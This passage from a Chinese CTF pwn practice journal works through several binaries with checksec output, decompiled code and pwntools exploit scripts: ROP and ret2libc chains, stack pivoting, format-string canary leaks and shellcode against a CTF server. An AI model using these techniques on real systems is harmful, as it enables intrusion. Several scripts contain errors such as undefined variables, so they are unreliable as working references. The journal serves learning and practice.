	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
context(os='linux',arch='i386',log_level='debug')   
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#libc=ELF('./libc6-i386_2.23-0ubuntu11.2_amd64.so')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./easyrop1')
p=remote('1.95.36.136', 2148)
#p = process('./easyrop1')



pop_rdi=0x0000000000400813
ret_addr=0x0000000000400569
bin_sh=0x000000000601050
system_addr=0x00000000400590

payload= b'a'*(0x70+8)+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)
sl(payload)


inter()

try_sandbox

2024.11.2

日常检查一下

1
2
3
4
5
6
7
8
9
10
bbq@ubuntu:~$ checksec pwn1
[*] '/home/bbq/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
bbq@ubuntu:~$

ida里面看看

1
2
3
4
5
6
7
8
9
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  sub_4012E5(a1, a2, a3);
  mmap(0x166000, 0x1000uLL, 7, 34, -1, 0LL);
  sandox();
  stack();
  return 0LL;
}

有沙箱,看一下过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
seccomp-tools dump ./pwn


bbq@ubuntu:~$ seccomp-tools dump ./pwn1
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x05 0xc000003e  if (A != ARCH_X86_64) goto 0007
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x02 0xffffffff  if (A != 0xffffffff) goto 0007
 0005: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x06 0x00 0x00 0x00000000  return KILL
bbq@ubuntu:~$

image-20241102192419015

没啥用感觉

就像是ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn1')
#p=remote('',)
p = process('./pwn1')
 
pop_rdi=0x00000000004013f3
pop_rsi_r15=0x00000000004013f1
payload= (0x40+8)+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(write_got)+p64(8)+p64(write_plt)+p64(main_addr)
s(payload) 

write_addr=get_addr64()
pr(hex(write_addr))

 
inter()

我说他开头说啥呢?

原来是

image-20241103144019963

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *

#io = process("./pwn1")
io = remote("1.95.36.136", 2074)

elf = ELF("./pwn1")
#libc = ELF("./libc.so")
#context(arch=elf.arch, os=elf.os)
#context.log_level = 'debug'
context(os='linux',arch='amd64',log_level='debug')
def dbg():
    gdb.attach(io)
    pause()

jmp_rsp = 0x0000000000401334
mmap = 0x166000

def Orw():
    orw = shellcraft.open("./flag")
    orw += shellcraft.read(3, mmap, 0x50)
    orw += shellcraft.write(1,mmap, 0x50)
    return orw

def Pay():
    payload = asm(shellcraft.read(0, mmap, 0x100)) + asm('mov rax,0x166000\ncall rax\n')
    payload = payload.ljust(0x48, b'\x00')
    payload += p64(jmp_rsp) + asm('sub rsp,0x50;jmp rsp')
    #print(payload)
    return payload

orw = asm(Orw())
payload = Pay()

#dbg()
io.sendline(payload)
io.sendline(orw)

io.interactive()

8字节能干什么

2024.11.3

看名字就知道是栈迁移了

1
2
3
4
5
6
7
8
9
10
int vuln()
{
  int buf[11]; // [esp+8h] [ebp-30h] BYREF

  memset(buf, 0, 40);
  read(0, buf, 0x38u);
  printf("%s", buf);
  read(0, buf, 0x38u);
  return printf("%s", buf);
}

显而易见了

日常检查一下

1
2
3
4
5
6
7
8
9
llq@llq-virtual-machine:~$ checksec pwn
[*] '/home/llq/pwn'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No
llq@llq-virtual-machine:~$

这里没有/bin/sh

应该还是迁移到栈上

找一下buf栈顶到ebp的距离

image-20241103155201177

1
2
Python>0xffab8268-0xffab8228
0x40
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	#p.send(a)
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context(os='linux',arch='i386',log_level='debug')   

#context(os='linux',log_level='debug')  
#context.arch = elf.arch 
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")


elf=ELF('./1111')
p=remote('1.95.36.136', 2123)
#p = process('./1111')



payload=b'a'*0x2f+b'b'
#bug()
s(payload)
rl("b")


rsp=ebp=u32(p.recv(4))- 0x40
#get_addr32()-0x40
pr(hex(rsp))



sys=0x080483e0
ret_addr= 0x0804838a
leave_ret=0x08048488


payload1=b'aaaa'+p32(sys)+p32(ret_addr)+p32(rsp+0x10)+b"/bin/sh"
payload1=payload1.ljust(0x30,b'\x00')

payload1+=p32(rsp)+p32(leave_ret)
#print(type(payload1))

#s(payload2)
#s("a")
s(payload1)
#p.send(payload1)

#p.recv() 

inter()

choose-找不到libc版本

2024.11.4

日常检查一下

1
2
3
4
5
6
7
8
bbq@ubuntu:~$ checksec pwn2
[*] '/home/bbq/pwn2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bbq@ubuntu:~$

丢进ida里面看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("Welcome to the PolarNight August CTF!\nLet go!");
  while ( 1 )
  {
    menu();
    choose();
  }
}


int menu()
{
  puts("Choose ur challenge:");
  puts("1.Format");
  puts("2.Leak Libc");
  return puts("3.Buf overflow");
}



unsigned __int64 choose()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  v1 = 0;
  __isoc99_scanf("%d", &v1);
  switch ( v1 )
  {
    case 1:
      format();
      break;
    case 2:
      leaklibc();
      break;
    case 3:
      overflow();
      break;
  }
  return __readfsqword(0x28u) ^ v2;
}

unsigned __int64 format()
{
  __int64 buf[5]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x28uLL);
  printf((const char *)buf);
  return __readfsqword(0x28u) ^ v2;
}

unsigned __int64 leaklibc()
{
  int v0; // eax
  __int64 buf[3]; // [rsp+0h] [rbp-30h] BYREF
  int v3; // [rsp+18h] [rbp-18h]
  __int16 v4; // [rsp+1Ch] [rbp-14h]
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(buf, 0, sizeof(buf));
  v3 = 0;
  v4 = 0;
  read(0, buf, 0x1EuLL);
  v0 = atoi((const char *)buf);
  puts((const char *)v0);
  return __readfsqword(0x28u) ^ v5;
}


unsigned __int64 overflow()
{
  __int64 buf[5]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x50uLL);
  return __readfsqword(0x28u) ^ v2;
}

看也看出来了

选择一泄露canary,选择2泄露libc基址,选择三正常打栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn2')
#p=remote('',)
p = process('./pwn2')
 
 
rla('flow\n',b'1') 
 

payload2='%7$p'
io.sendlineafter("Right on! So do you know what a canary is?",payload2)
io.recv()
canary=int(io.recv(18),16)   #这里是用字符串形式输出的,所以要int转为16进制
pr(hex(canary))
 
 
inter()

可以看出偏移为6这回我们可以泄露一下canary的值了

格式化字符串泄露canary

每次做题都得翻一下笔记,so准备详细记一下

第一步:确定偏移

image-20241104140917834

知道偏移是六。

第二步:确认canary距离我们输入rsp的距离

gdb运行

1
2
3
4
gdb pwn2
b main(b *运行到read输入的地址)
r
stack 20

image-20241104143953065

地址减一下

1
2
Python>0x7fffffffde48-0x7fffffffde20
0x28

但这里我想直接在ida里面看一下会更简单

首先看一下汇编代码找到canary的位置

image-20241104144350457

在看一下栈的位置

image-20241104144509834

最后:确定最终字节

除以8字节,为5,得到5+6=11

然后就可以正常泄露了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')


    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('./libc6_2.18-0ubuntu3_amd64.so')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn2')
p=remote('1.95.36.136',2086)
#p = process('./pwn2')
 
 #canary
sla('flow\n',b'1') 
payload2='%11$p'
#bug()
s(payload2)
canary=int(p.recv(18),16)   #这里是用字符串形式输出的,所以要int转为16进制
pr(hex(canary))

#libc_base
sla('flow\n','2')

#sleep(1)
pop_rdi=0x0000000000400a93
ret_addr=0x00000000004005f1

puts_got = elf.got['puts']
pay1 = p64(puts_got)
s(str(puts_got))
puts_addr=get_addr64()

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
sys_addr = libc_base+libc.dump("system")
bin_addr = libc_base+libc.dump("str_bin_sh")
'''
libc_base=puts_addr-libc.sym['puts']
pr(hex(libc_base))
system_addr,bin_sh=get_sb()
'''

#overflow
sla('flow\n',b'3')

payload=b'a'*(0x30-8)+p64(canary)+b'a'*8+p64(pop_rdi)+p64(bin_addr)+p64(sys_addr)
#bug()
s(payload)

inter()

不到为什么,还是打不通了

格式化

2024.11.5

简单检查一下

1
2
3
4
5
6
7
8
9
10
bbq@ubuntu:~$ checksec 1111
[*] '/home/bbq/1111'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
bbq@ubuntu:~$

看着不难

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char format[200]; // [rsp+0h] [rbp-D0h] BYREF
  unsigned __int64 v5; // [rsp+C8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  gets(format);
  printf(format);
  gets(format);
  printf(format);
  return 0;
}

看着不难

应该就是第一个gets泄露canary第二个gets打栈溢出

首先找一下偏移

image-20241105205304486

知道偏移为6后

找一下canary距离栈的位置就行

确定为25+6=31

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./1111')
p=remote('1.95.36.136', 2086)
#p = process('./1111')
 
 
payload1=b'%31$p'
#bug()
#bug()
sl(payload1)
#rl("0x")
#p.recv()
canary=int(p.recv(18),16)   #这里是用字符串形式输出的,所以要int转为16进制
pr(hex(canary)) 


backdoor=0x000000000400805 
payload2=b'a'*(0xd0-8)+p64(canary)+p64(0xdeabeef)+p64(backdoor)
#bug()
sl(payload2) 
inter()

ret2libc-找不到libc版本

2024.11.6

1
2
3
4
5
6
7
8
9
10
bbq@ubuntu:~$ checksec ret2libc
[*] '/home/bbq/ret2libc'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
bbq@ubuntu:~$

丢进ida里面看看

很基础哈

没啥说的

1
2
3
4
5
6
7
8
9
10
11
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[112]; // [rsp+0h] [rbp-70h] BYREF

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  gets(s);
  puts(s);
  return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import*
from struct import pack
import ctypes
from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./ret2libc')
p=remote('1.95.36.136', 2084)
#p = process('./ret2libc')
 
 
pop_rdi=0x0000000000400753 
ret_addr=0x0000000000400509
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
sl(payload)

puts_addr=get_addr64()
pr(hex(puts_addr))

'''
libc_base=puts_addr-libc.sym['puts']
pr(hex(libc_base))
 system_addr,bin_sh=get_sb()
'''

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
pr(hex(libc_base))
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")




payload2= flat([b'a'*(0x70+8),ret_addr,pop_rdi,bin_sh,system_addr])
sl(payload2)

inter()

本地能打通,远程通不了,基址也是对的,环境问题吧
跟上面那道差不多一个问题

Choice

没啥说的简单的后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF

  init(argc, argv, envp);
  puts("请输入要进行的操作(数字):");
  puts("Menu:");
  puts("1.新增数据:");
  puts("2.删除数据:");
  puts("3.查询数据:");
  __isoc99_scanf("%d", &v4);
  if ( v4 == 1 )
  {
    Data1();
  }
  else if ( v4 == 2 )
  {
    Data2();
  }
  else
  {
    Data3();
  }
  return 0;
}


int Data1()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  puts("请输入新增数据的名字:");
  read(0, buf, 0x35uLL);
  return printf("输入完成!");
}

int Data2()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  puts("请输入要删除数据的名字:");
  read(0, buf, 0x35uLL);
  return printf("输入完成!");
}

int Data3()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  puts("请输入要查询数据的名字:");
  read(0, buf, 0x50uLL);
  return printf("输入完成!");
}

选三就行,正常的栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import*
from struct import pack
import ctypes
from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./Choice')
#p=remote('1.95.36.136', 2084)
p = process('./Choice')
 

backdoor=0x0000000004007BD    
sla('查询数据:\n',b'3')
payload=b'a'*(0x30+8)+p64(backdoor)
    
s(payload)
inter()

x64

日常检查

1
2
3
4
5
6
7
8
9
10
bbq@ubuntu:~$ checksec x64
[*] '/home/bbq/x64'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
bbq@ubuntu:~$

没啥说的,直接ROP链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

p=remote('1.95.36.136', 2085)
elf=ELF('x64')



pop_rdi=0x00000000004007e3
ret_addr=0x0000000000400549
sh_addr=0x000000000601060
system_addr=0x000000000400560
payload=b'a'*(0x80+8)+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)

p.send(payload)
p.interactive()

你是大佬还是菜鸡

日常检查

1
2
3
4
5
6
7
8
bbq@ubuntu:~$ checksec pwn
[*] '/home/bbq/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bbq@ubuntu:~$

一样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

p=remote(' 1.95.36.136', 2105)
elf=ELF('pwn')



pop_rdi=0x0000000000400933
ret_addr=0x0000000000400549
bin_sh=0x0000000004009A9
system_addr=0x000000000400600
payload=b'a'*(0x80+8)+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)

p.send(payload)
p.interactive()

play

2024.11.6

日常检查

1
2
3
4
5
6
7
8
9
10
bbq@ubuntu:~$ checksec play
[*] '/home/bbq/play'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
bbq@ubuntu:~$

看了一眼主函数

1
2
3
4
5
6
7
8
9
10
__int64 play()
{
  char v1[48]; // [rsp+0h] [rbp-30h] BYREF

  puts("I think you must enjoy playing.");
  read(0, &buf, 0x64uLL);
  puts("Name your favorite game?");
  gets(v1);
  return 0LL;
}

前面的buf实在bss段上的,so就是shellcode的无疑了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *

#p = process('./play')
p = remote('1.95.36.136', 2092)
context(os='linux',arch='amd64',log_level='debug')


shellcode = asm(shellcraft.sh())



buf_addr = 0x0000000006010A0

p.sendlineafter('playing.\n',shellcode)

payload1=b'a'*(0x30+8)+p64(buf_addr)
#gdb.attach(p)
#pause()
p.sendline(payload1)

p.interactive()

name4

日常检查

1
2
3
4
5
6
7
8
9
10
bbq@ubuntu:~$ checksec name4
[*] '/home/bbq/name4'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
bbq@ubuntu:~$ 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int Start()
{
  char s[20]; // [esp+8h] [ebp-20h] BYREF
  int v2; // [esp+1Ch] [ebp-Ch]

  v2 = 0;
  puts("Enter your name:");
  read(0, name, 0x40u);
  puts("Enter your best friend name:");
  read(0, &::s, 0x40u);
  if ( name[0] )
    return write(1, "Are you OK?", 0xEu);
  puts("give you stack overflow:");
  gets(s);
  return printf("byebye%s\n", name);
}

看着if条件语句是一个绕过

我们用空字符绕过一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
from pwn import *
#from LibcSearcher import *
#p = process('./name4')
p = remote('1.95.36.136', 2084)
context(os='linux',arch='amd64',log_level='debug')
elf=ELF('./name4')
libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
